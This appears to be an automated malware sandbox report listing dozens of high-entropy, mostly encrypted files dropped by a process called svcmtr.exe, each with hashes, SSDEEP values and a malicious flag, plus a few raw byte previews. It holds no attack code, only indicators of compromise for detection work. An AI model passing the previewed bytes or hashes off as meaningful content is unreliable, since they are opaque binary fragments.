                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):238046
                                                                                                                          Entropy (8bit):7.999182213002957
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:6144:2Zm/ctnx6ARQEOoIcKrYeIDEu2M2Y7jbmvnHcCN:2Y06KQEXID0/Dp2MZPm1N
                                                                                                                          MD5:E33D8BB35F8206E9FEC679DCE5198902
                                                                                                                          SHA1:699F290DA94D14749CF09EFB882C2C9B6C599781
                                                                                                                          SHA-256:2BF5FFDF6C849942093343835BB7A68865E0C9D299795C5C09B15A41FCB6FB7C
                                                                                                                          SHA-512:96315A191B805AB97B36DEA8A53E6B3B8F8A0BC1E86E7DF4CA054B7B4145620EFD7E0FB5E38337ABE4EDE41D67AE344FA85F7F0D21377C8A311D115613B99AB1
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):112782
                                                                                                                          Entropy (8bit):7.998677666438719
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:IgHP0BNzrPhTHNUx+bG8wGOdMqYRK3ibtarQD:8NzrZTtTk5iBqQD
                                                                                                                          MD5:6F55A572F1094DB3F8B9514286E13AAA
                                                                                                                          SHA1:FF9D23673B0942AA35174420F1ECEAE45E19C0F7
                                                                                                                          SHA-256:6D9A58D3C6C690C94161A058D7CFA6746AF9A1C20F677232707ACC61947A0401
                                                                                                                          SHA-512:C98C8F53B185AEC9C0B3957008699DF62E14CE01AD352D6638B0B3B21D55A084BAE6AC1A6DE4A8C86917CCF3B5071629F8FA7BD3A734441678B46670CD390514
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):94878
                                                                                                                          Entropy (8bit):7.9980371289190595
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:VXe0033wVR6+Yi+qkoqEKDlKH7hb35MWTAmHpeI086c349ONHxGX/kfdTB4hv/YM:VuPn+0VivkHKZnx086f9ONHK/MBov//J
                                                                                                                          MD5:04A505AAE0DE54D383A2864C42ABF83B
                                                                                                                          SHA1:3ABE2BC6E2E127D61842614985AD80B662287896
                                                                                                                          SHA-256:73CF7FD7EB0EC82788AC290D39DB00181A7E01DD21C8B122D5D5B9051526436D
                                                                                                                          SHA-512:A31780406631D592E1E01A8EBF3EB5415F1F3AAD07F04A16817996F31878F5A1D6169AC9AB18120C565D22D3478B36073074989DD062B926FD41139F9CAACEE3
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):94878
                                                                                                                          Entropy (8bit):7.997887264203218
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:sii4M4pnwnv28C6yHLtK6Ph4ESaWYEb4pQI5xwJXXR08NuRknaS5wagDzo8INhV9:HnM4pwn+8CxZ1SaWYYl5hXm5SnaOrmol
                                                                                                                          MD5:A8163D261CB81067929DBE94A35AD098
                                                                                                                          SHA1:C4E5CE0656766325A8665C0A6015EB0A2664D2CC
                                                                                                                          SHA-256:DC5DDD6AB2104CE4A072A7344E54F7DC687E2C30B1E69747E11A4BC71C1006AF
                                                                                                                          SHA-512:DFB65AE0819FB30EFFD20524E8F43900ED743B2CF71A0788DECCA7AC097FF502D74EB7397B350D0543554D5BA161C4836BE5E431DFC0355DD148CA5151C14E45
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):139614
                                                                                                                          Entropy (8bit):7.9984534759836015
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:vh22Q3J5JRTIVgkG91y7ucbzqFQJ/fLG8KHRSz7MHpATIGP:vQjVIVKvy7ucBlfLhKEvDIGP
                                                                                                                          MD5:C492BDA69CD3F1D9EE4F0C66440A1F3B
                                                                                                                          SHA1:5C0802DB20057BDF31116A27C5939DD3B7C571B4
                                                                                                                          SHA-256:39921D8FBC985D583A162CD901C01127A6F295D23CDD870B93913FF9B86CB70D
                                                                                                                          SHA-512:AEF98D599D93A721954B7E2A981A98CAF31F95A93F5267A32510D281D1C75481CC440BEB2F5A9603E65F484844CDD3A4F861A288DC6C224973D72978167CA989
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):112782
                                                                                                                          Entropy (8bit):7.998461573117077
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:u3FTY8yOyHyG/k1quwoC3HzvfZXUhdipshyzIKtTKKnNuw4V8g+AJK3L9I3QAGcf:u1TxyFz/jU4HbW0psWpNdYoOKb9xncqu
                                                                                                                          MD5:759EEF7B3674F7598D102B009F80784D
                                                                                                                          SHA1:8DE5077188531546069A338F08E62312CA80B428
                                                                                                                          SHA-256:4509D90F70464C9676E1BDBD46F4AA67930093110D43554369B9F61BD2F13F4C
                                                                                                                          SHA-512:01D2C20D5620056B1615ADC3572EA576A7C077CE54080F274B0CB44C4E8D16A014B2156CE59178EF2B1EED6D35722BA4813ECD60E864AA1DBA763E18E7D57708
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):94878
                                                                                                                          Entropy (8bit):7.99809516643394
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:VcQ+4MY/mJtprGgbIkJ759IK22DGjjyD2jvRvD8SDmDs5HReTyWkDMvbt:VmlIrEbxfDj2ZjDDHETADu
                                                                                                                          MD5:0CD36C25DB63B55810F524E8FAA406EC
                                                                                                                          SHA1:49E3A02EE8CD437620DC0E5C855430B0697C45F3
                                                                                                                          SHA-256:511D8D70ED9CC9E6CBF5476FA3B79CD9417BA35780CD02C5FBB9251AF98771CA
                                                                                                                          SHA-512:F1D58D87CC940DB6BF5AFE06AB4F5FB40597357E93A7D40FC9C2A76136F55279E2CCE6A2222628B51A5971D975D2F4178D52C3030D4272FD392528082EDCA200
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):879822
                                                                                                                          Entropy (8bit):7.999783565202353
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:24576:56jGwk4eMjnsZbcdSzjiV8ZptChrFwwXZKyHQ6M:MX79zsZbcMIowrKOmX
                                                                                                                          MD5:98D1DD45E84C2277FAD0EB8368A2CE0A
                                                                                                                          SHA1:82C9691BB6AEE61B8025EDD6E25082BFA0C6D8A4
                                                                                                                          SHA-256:8B4D65308DAAD24E20D4433595867D645C5BC64F8EF1D4B069FE8ABDACE4DBA8
                                                                                                                          SHA-512:3040B0E653477EF46457EFB9B8509F606D25584EE2980722FE2146FA8FF8BABC540200B03D5046C4E558853E7A61DBB574EDA9DB98FE4CEE6690A791B7B63A58
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):596126
                                                                                                                          Entropy (8bit):7.999628599330229
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:12288:oEcuRGrVjPy7PM2q+xCorpiDwhQV6Nb3HIDFKubFZ2vuQzgYx:TcuRwVjPyzMxrOpiDwhpNbeFxI
                                                                                                                          MD5:C29B66447212572A9F0ACF11D2DB0229
                                                                                                                          SHA1:E55C867AE6B8B28FB1895E45D1606062F53C06F5
                                                                                                                          SHA-256:205BE3BE3BEC79F058B746ACB7D9C5C6B5DF6A7238ED31F16E5805BBC9FE050A
                                                                                                                          SHA-512:6E131BA63E6E8C77A981301F20E78384A99C73B53D7D3050D48B92356C0449D6972DEC1D571E64C747AC008D196E37574BD5E3A34ECFD3B41F197F0DB8C7EE0F
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):776542
                                                                                                                          Entropy (8bit):7.999757453156257
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:12288:idKFI8B65Kr43g/B38bUiZT4oC6zyZWdnU4jYAzrasCC1lnkpxLn8ymD6Pnuaxtf:jIk4utSUiVk2yZWtU4jYAf31JkpxLRzx
                                                                                                                          MD5:BC5C99A91004E1E4FEFB21A10DFC9539
                                                                                                                          SHA1:E618E84817C835D02CABCEFFD5DB44C5D4C007B9
                                                                                                                          SHA-256:B3D8FF8168DFDDC6204F70E310A778AF13EA509BF9B1AEFF059D35BD15E1441D
                                                                                                                          SHA-512:9B05A6260C18779C0ACDC78BE379C0B05794CDA2BFEA48FBE6493E4076079FAB562FD0F652519CF613227BD687A6971E7535EADFEF48F6A9F2350357BFDBFF53
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):562110
                                                                                                                          Entropy (8bit):7.999634521097577
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:12288:FyGp41iRFEWOg9WFDxziFy9C6Jn+nrvQYSunCnQcHvzJz8GQXfv8G:Fy241euYUFDNic9Czro1QHh
                                                                                                                          MD5:C50F1D1AE37CAC1671FAC9712AA9E0A4
                                                                                                                          SHA1:5A8176A1A84E7D3945D5AB8F65A64FAB0CFE5366
                                                                                                                          SHA-256:419DFC785D372006C4F5081E2E13984F5CFB329EC9755C52524B598D4B8BAD28
                                                                                                                          SHA-512:59A87153AD051A4A1FFE28C47AF9024AAC74B6EF36C1A417EB484CE7C6A5269AA7E6FBA3E657311D9A04CC562B7209BAC480B8F96205C5B2A989C17974816DDC
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):778670
                                                                                                                          Entropy (8bit):7.9997883961911445
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:12288:AJhQRt/1MQJfwUL3pPOO8rpzpkuvHQuj9jEEkW2apGWnYLEd0An3L+yCtc5r:QQzWslzpJ8rpz66j9wEkxmG3LEd0G36S
                                                                                                                          MD5:B1EA50F874E0B9DB9A7ADD1DD86A3B34
                                                                                                                          SHA1:A7A7E49BCCE680D0FF5C940E9584C308B6D05128
                                                                                                                          SHA-256:ACC54ACE830C307BABCF47B108685425CFF3285F30E193D4315E37F816BCEB8E
                                                                                                                          SHA-512:22F32BDB3C3E6C717C5689E0E4D223E0AC4F3B123E122F292826F686417DED6C70AD75B79995260164434780B6A13D53E83D6159706E597E51EAA519EE0BA1EF
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):32670
                                                                                                                          Entropy (8bit):7.993974679204377
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GYskjUBMsFLR9gyow/2orrqovrLcFQeWW6POd:ekj+MsTDoxo/WFXd
                                                                                                                          MD5:B2557DB402C3224A6C20FA9B15B1F72D
                                                                                                                          SHA1:D1756B5D91A7684B987F6F115D12C4C280C71614
                                                                                                                          SHA-256:C6CE5839C100EF241A7F4B142B9359776043AA9748E37060533D9FC7F59F9CF4
                                                                                                                          SHA-512:C9745A564FF8258CDBB17D174287F96982D7CAAF1183A93A25A53FFA65AA53C13E0434890343004C2595B19C70031C3FED7870EB4E7CD25ECC4151229517825B
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):32670
                                                                                                                          Entropy (8bit):7.993974679204377
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GYskjUBMsFLR9gyow/2orrqovrLcFQeWW6POd:ekj+MsTDoxo/WFXd
                                                                                                                          MD5:B2557DB402C3224A6C20FA9B15B1F72D
                                                                                                                          SHA1:D1756B5D91A7684B987F6F115D12C4C280C71614
                                                                                                                          SHA-256:C6CE5839C100EF241A7F4B142B9359776043AA9748E37060533D9FC7F59F9CF4
                                                                                                                          SHA-512:C9745A564FF8258CDBB17D174287F96982D7CAAF1183A93A25A53FFA65AA53C13E0434890343004C2595B19C70031C3FED7870EB4E7CD25ECC4151229517825B
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...'I.0d......,...}..3.Yz.......E^.....AJn...=....C..,]-...l.g.............."D..(Tx.....}.z...n..1.]D ....6.....^[L..K..(.s....\.Rog....g.@}.|.......I.......,6........fP.H.;6.AL.X.....wC.4Z.........A...uc......./C.R7....,..W....u+.....W.2.........P..q1c.k.O>.......s.&..5.0j?.........G]oaCZ1..D&..+..K...+.o...J..7N. .i......,.I.B.......O....k...&.m....K.L....V...6...95...O.h.T.(L.8l2.=a....7/.....o!6......f.V..}.y..1w..0xA..Zdn..WN..4.':..m.v.c.Np..G.1.#....ukM....9^..N.r.N...kN ..c%.q.Z....S\.p3Ub..x....J...L9EX...$..k.5..w....U...*&.c.o$.).%s..&...d.....V..VI.C.#?....
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):14014
                                                                                                                          Entropy (8bit):7.982128019097481
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:GQalL8qh4kmiQHd1xJjrx8qnH+fabjKEON5A3oAW:GJ53QHHjyqnLOM3oJ
                                                                                                                          MD5:3EC292CC41380F39BEFE685467867D70
                                                                                                                          SHA1:92BF3F936B814D310F6E6161E9CB77C7AEAA6488
                                                                                                                          SHA-256:A86D470ED48C94CEC6DC492DC4DCA9ED46014C5ACE3823E22DE1F73B81889D1A
                                                                                                                          SHA-512:F7768C23A9ECC7E63FF50450FCBE3B8EF9B48A80C0914788CFF31E47846BAF4DA19FE2FB0D4DAE401177D959F1B619477A2DF92C5298316038F356736997D44E
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):203310
                                                                                                                          Entropy (8bit):7.99907789331035
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:9Qnl4GDUDp0/OEXxbZdns47BmXm1x5hakIAgSrNOTuFZqUjYshU5GmOXaoC7VHSv:9A1Dn/O4xHnv1nhwA8Tumy3U5GJqHp4B
                                                                                                                          MD5:F8408F8A1FA59EF1E88E7F8856DD9067
                                                                                                                          SHA1:A31FD57013390645C2A4B056424244859C569919
                                                                                                                          SHA-256:38BC49A2D2DA6F456DEB13B4F5770ABEFF4BC7C603EA1A5BEA9081C985954208
                                                                                                                          SHA-512:6703BFE276B52A2DABD5A032A100379FA89CCCEFF345A9EEA78BD0E06942605B671953FAC527603C7669923ABDC870B1AD52529D53BDCE69DA7BAB0B5ACA104D
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):89838
                                                                                                                          Entropy (8bit):7.99793205066853
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:+AHBJMWdeQJiUuIBwBjeCupXnN8cu4j1gWG0hzuzB6f7mICWX5I0S+bM2+ESwMXW:+AHPiUuf9S3aD4G0kIiNabubtrC
                                                                                                                          MD5:6684D40273D4E4FE206FA24E84168304
                                                                                                                          SHA1:01C54921E0E193D24D067CD64C46CEA11867CE88
                                                                                                                          SHA-256:6E942310002D1A88A0CDB83D4B36E2508E865C78A57AC8DDA284D88868F28C80
                                                                                                                          SHA-512:9B7226680663C5A366AC51CA289B7153B9543AAF8532D6973E06748B0ECE9E65B3DAD854489C56EEA96E7D59907434FEAEBFC8CBFE661DD69E552EFE37143771
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):125406
                                                                                                                          Entropy (8bit):7.998554824046652
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:I6gvUVmtf7FONScvk0hevM+T7n912ZpAb7aSdPpjolfMOP:VC4md7QS8kkevMgSpAb+SAf9
                                                                                                                          MD5:5459210CEF20FCB1645E313E7337D1AE
                                                                                                                          SHA1:19DAEE16C628A91546835AF087CB66769624D018
                                                                                                                          SHA-256:F92B2D19EC5F9C6B9418B7E29D6E6960D61336E88CE6EA8C001F0F2E34623EE5
                                                                                                                          SHA-512:F5E4DF71077E2A9C869488D95FE591CF18C15CEBE50991870C8AF37A53ADADB733E8C1B53759B846BAA130A43098635DC6252CA15E557D634ABEE19C499CDB14
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):105470
                                                                                                                          Entropy (8bit):7.998122448862424
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:MyvWHncfr1Trg3Q+QYH7ShyF7EjWQGPoMuNnnocHzQjX9D9nBklrVH15TxtiVUbj:ka1A6YHGE7SGPoMQZHMFKh152y5LWWp
                                                                                                                          MD5:2E9F06E15B991039F83214390AFFA4D0
                                                                                                                          SHA1:91BE962936D0B2A53DFE8FB1FF7FCFC23F28BBC1
                                                                                                                          SHA-256:BCCE2FF2416866EBB4058E4288AC143C5D661CD3360ED36ECDEA4D66E4EB4BB2
                                                                                                                          SHA-512:C86A78BB6746FE7F3069487923E725C67469EBE21CAB26A166378B01CCF537D14D0DFEA351F02CAADB047EE67F06881A76B04D8595361FA9ADE03933E6ED8AB0
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..T5x....-.O|,...]....%.......V.W0.....7...p_.}..47.2..3..p.S....S..d..>a.......f..H...6.A;h.w...x..V],Ht.z{.~e.5......*..%......0...U;.z.:..V.u.;.r.X...t...\C.v*...@.. ;.Q.....*.o.....{.}.1x.m....O_..W...~..T...A3....`L..M.....^.N......+..\=1...>...y`........8.^.Jw.......:../.O..b{4..d..u.UW9......T/.kC..O...R...R ...Owg01".).?fT.K.a...~...Ts..'..?;....M/8..W(p:..m.1b...A...(..N..0...jqg..M....m..(..x.lF(...+}...6.H.y........n......T.npH.<.#....;..v.$.[3.u.....Eb...._<.H).;..k../`...i=...&(3.U.YZN...f.p.u.0y.lt...QgT..u.OC..w.kg0..O..c.{..-..T.....Wt....jd..........sU.a....L...I.
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):105470
                                                                                                                          Entropy (8bit):7.998122448862424
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:MyvWHncfr1Trg3Q+QYH7ShyF7EjWQGPoMuNnnocHzQjX9D9nBklrVH15TxtiVUbj:ka1A6YHGE7SGPoMQZHMFKh152y5LWWp
                                                                                                                          MD5:2E9F06E15B991039F83214390AFFA4D0
                                                                                                                          SHA1:91BE962936D0B2A53DFE8FB1FF7FCFC23F28BBC1
                                                                                                                          SHA-256:BCCE2FF2416866EBB4058E4288AC143C5D661CD3360ED36ECDEA4D66E4EB4BB2
                                                                                                                          SHA-512:C86A78BB6746FE7F3069487923E725C67469EBE21CAB26A166378B01CCF537D14D0DFEA351F02CAADB047EE67F06881A76B04D8595361FA9ADE03933E6ED8AB0
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):96494
                                                                                                                          Entropy (8bit):7.998267792969075
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:gIRZiZbtUSdnKXuboePFmkX/VqRlLGEO1Xv4vlJKBIo2ZUQWVnGiwhVx5aA8:bynToeEkPIGJ1XwvmIqQW0zhVxV8
                                                                                                                          MD5:3CFB9A4EC67395CB74D160A031907066
                                                                                                                          SHA1:DCBEC020690129ABDE37DDB7F91391A151B207AE
                                                                                                                          SHA-256:7495D175230D48ECA45942AF13FD965FAE8E2F33A32D780D7F47317BF002B5CC
                                                                                                                          SHA-512:4495C0030ABAE7DFB9D5E6D9E2BDCEA21079AF3DF35EBCADB605A35C7C4CC26B94151ADBA7F9CE21DA35C9A85635AA43D7C7A8AE0588147BE38DD3F4D417E627
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):136030
                                                                                                                          Entropy (8bit):7.998663148204875
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:kgJsdSaSE/MPbY9JeL97PnHgy7ChF3ncSr24xcq2:kQISLE/wbY9JoDoc6z2
                                                                                                                          MD5:1BD210F74E8EFF8B74D628334FE06D2A
                                                                                                                          SHA1:59557C07D970613B1DA6058E53688A75AED18ED4
                                                                                                                          SHA-256:E3BF04C53343616AE32F4F1979653DC1FB77589D1CC4350CC72DDDB2ECACE0D6
                                                                                                                          SHA-512:7CD5B09F244CCE274FC60B14DF3C423385C66571B6252E1F08980A06772F94F16CBDEE2155AC6DC4D1DA09B1064ACD1FE325EB3E915704FA0C61A4161B8B5E0E
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):41902
                                                                                                                          Entropy (8bit):7.994987557161011
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GBa0hNkeZj1WN5uwOnAVBhyF+tEL5YaWA7bXUqHDs+it7ZkdNBhvLy8U:6kefJwO0BhG+Q5GIbEqHDs9FZknG8U
                                                                                                                          MD5:D2F9B8D5D5C66EB20394376B5A861BAF
                                                                                                                          SHA1:49C7947ED6716F27D8895BC54E6786015839812A
                                                                                                                          SHA-256:9DF5D3536D1B2D5C89D8E937061DC37666C6BF05C5FF0B2F0D315FAC0986D589
                                                                                                                          SHA-512:E4AE9C7B7855D92C2868E8EB705D2C892930C77FACC1BD535B9E18E56B576D7C103EEFCB5F37B99FD887BE4206B34D07B1DF59EAD15F58B10D6D9283595DD34A
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6750
                                                                                                                          Entropy (8bit):7.959292758147358
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:Gowl2bllyjWj9R1aHj+dQvSliiTG8zwU5PXKK:GTwSijz12jFqQiG80U5fKK
                                                                                                                          MD5:E917BDDEFF73DAD8A0C824B7AD0E44A6
                                                                                                                          SHA1:CEA18F94B57BC48A5E80CD3F5C2E0778C9D0F4A7
                                                                                                                          SHA-256:E2BF937345313ECE2F192810ADABF416066A734C21574D8F01C4B52C243162E2
                                                                                                                          SHA-512:4681A32A3FAD40743A14C0AE426D07CD595ECB267C46E3C7E050E42940A9000F96AD4026BBEFDAD78A194CC34853FB3CA34B71421CC23FDA789FA280A8F601A9
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7742
                                                                                                                          Entropy (8bit):7.968467131322745
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:Go25BRjVYJDxgoacFSoiYqdteeuqubfVWDYtCch0G2:GThy1mc2dt+qgfY9nG2
                                                                                                                          MD5:6FBA08C71C00FA74C5086A701866BA75
                                                                                                                          SHA1:64447A24CC590AEA619894BAE44298DE19596841
                                                                                                                          SHA-256:A41E05FE95B37D4AB26AD2D2DFDB3D329373061FEFB5BEE1AEFE32690697F7C8
                                                                                                                          SHA-512:974F46151DF1BF3FC2A63826629490095A59914EF1D16197DDA51B457A618DD9D21F1AA761B25FA54F43596B1BC57CF301890600F61F0993656C724733434ACA
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6414
                                                                                                                          Entropy (8bit):7.950984719923816
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GoO2yvsAJ8KuBIWfENFZMMK2XnkWJafjMqqoPn37i:Gx8i8KGnkXkWJafjMt8n37i
                                                                                                                          MD5:655E4E8119977B99715BFC0B2C68C160
                                                                                                                          SHA1:9D111D6D72B9FE88B542A2B5EEF0970B10A37D5B
                                                                                                                          SHA-256:5B259AEDAD77C8B461F0EC35078F5B049CB31781458C68470A245A9C52EEBFFF
                                                                                                                          SHA-512:C77EC28C3620097B1EEDFF944FA9E4F9F2F96D829773B7EFA4C4A080FEAB8A84ED93D43CB1A8697C98B4218C43C65B8BDF97C2D5D19B1BD2FEAE4068E20A7424
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40030
                                                                                                                          Entropy (8bit):7.9955595085888245
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GnJViSZnoUgwm4ghfn6bfuwWlwZ1lkIG6E/SOJuHTIXLmWE4G4n:6GUnqpCjuMf+ItdOJuFXJ4n
                                                                                                                          MD5:E34E4F808A1077C5CF6AAE112BB746BC
                                                                                                                          SHA1:DD72D88DC81845260F1EA50D5FDEDA09DBBB4207
                                                                                                                          SHA-256:A2DA3BEB8F152F543D791CBA20F9B17DADF9F1AA6DA7063783399099C344F925
                                                                                                                          SHA-512:7AF4907FB514E0FFF52408D0DA4A7550014DEF8B409D5685E7C6C81F0B8D0AE8B597AD08DCDB6FB9842E7B0E67646E115D5FFBFB4439279E5F7A117B6380411F
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):18110
                                                                                                                          Entropy (8bit):7.987013547214024
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:GafZB5uJUKclfTtrI6VLnV37W0QpXUrjU+IooeeNhJTMktQmoIbL5UM:GETLKcHNVJrq+ceejUjIbL5UM
                                                                                                                          MD5:96DFD73D9630CD966CE487AE9CA742FF
                                                                                                                          SHA1:21CF0741FF3A4D89228EE462187AFA685D15DD20
                                                                                                                          SHA-256:90A9F48918FD14830389B25FA4AF315ADD57638969B422A35826E066A6E84346
                                                                                                                          SHA-512:6912B477DAF9028148046BB056CB5E21B0BF096BEDA750AA49008A7813A6489C150380D8552A9433FBE59AA3325001592829C7F01A4E39222CBE5DD2442E2D06
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):27806
                                                                                                                          Entropy (8bit):7.99330090540058
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GlENcYgld6/32wq3rZun+7odwdoMffuLlz9x52:8Y8dqq38+7oSBf3
                                                                                                                          MD5:BEE4BE4A30A7BA827E3E4DF9FB31D83E
                                                                                                                          SHA1:944895D8AA2911EE51C6947566109DDD2DF5154B
                                                                                                                          SHA-256:BC0B7C1714649031BD65ABE4A882B400D0060771C03538C3073261051E6B1315
                                                                                                                          SHA-512:566343088C8A1F0A5AD43A4624092262EB01B7130EA344211AD4DE0AF2E0B903CC4B6516B7CF34412CA4AB44602AAEA35D5AE026B91A94A66856FDA5E2F2652A
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):29758
                                                                                                                          Entropy (8bit):7.993461548416619
                                                                                                                          Encrypted:true
